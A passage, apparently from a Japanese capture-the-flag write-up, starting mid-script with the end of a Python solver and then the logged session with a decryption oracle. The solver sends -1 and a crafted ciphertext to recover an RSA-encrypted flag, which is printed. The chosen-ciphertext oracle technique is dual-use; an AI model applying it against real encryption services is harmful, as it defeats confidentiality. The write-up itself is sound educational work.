assert pow(m, 2, n) == m2
flag = long_to_bytes(m)
print flag

実行結果は以下の通り。

Welcome to your local encryption decryption service John
On tonights menu --- 4407310384344744559634957725010694638443742996979587133216526008058433976606317517106626661668804623130308780155059812181215198027377854430575907000333681480618805722483651983469101439483537490835890412335162744892857319064827984726342390253726212518308859893607979683400380666427781056142970039387352955570871329129743676632278876592317068679470256451956541744238831167522798586391596080489296745509475311540862565262329391086487609297037080408751734264306865594457333144625496487063624312014147302482292282719586341666457955470948051510757426531717376609431485166076435111350208550372339070997859548162461662991499
1)Encrypt
2)Decrypt
3)Exit
2
enter text to decipher:
-1
20458405486639479765498618668548059407782852245848722326337988484890272843770087351001442827340711794980519833069124719506624589922868608623978016090222873801824998909822279980355035046799721050422454196247883237151926682669083567239052346551610749486102051691684914490669652417474645970701209699958529597375425886586884334748721519303193019343957778070001526053250655775286666074970689030774039780129713781580627841153533505392919683637497198550630099634478579832592095670411310902194112743916089132083656512482198741083440903024546555480184506369978286469221306836089775077535726979146520381681645033314724366576532
1)Encrypt
2)Decrypt
3)Exit
2
enter text to decipher:
19424384823953020011132161673079202905320549920209492179714092550914741928796389057168861868343689635339807158925780092200701963531985549695276268908252479705410335899197865246270400852600041510071396852075081837007812509201635803782647412697889045558724024305164879160162664297858914438860372528822563845138009491622243915724325764230266058721222937843340291425075398720995993162253037919134018062277719027851541104502276063989666455888194620729526583286996765509397455517725125725963760007329239381924684517541489625579821348589668915043013418371460287308104732424230867457321853982841247479532136060607909075275979756478677938069327808204681782296518047864260070931567913614030260503313573955903693195221486665291166329407374507981642299596403689079072113528733127389065991293070084859720331779680257580692521487674744310776709217340974431859619714185994234343350404194083773697986307833237905443063278278929675225211469933211788880562329253132438841572450869358298983877511763617777356983056221667855805109805684235969376157441036077933196114226509069798545151811214738971401524104241873451213854512591201696907014072611213486111214350443789421385340308662363931258894486418478456399047101109708458358304831906867395805746267001
55382753472373737060855607180565475102219017834395954156654914018053019604884382997907855185795659425976606267092658315715302575423208142248541385480026547845485519515936870617957441478803259582601124444441811176537395161
d4rk{th3_ch33si3st_m4th_p1zz4_f0r_d1nn3r!}c0de

d4rk{th3_ch33si3st_m4th_p1zz4_f0r_d1nn3r!}c0de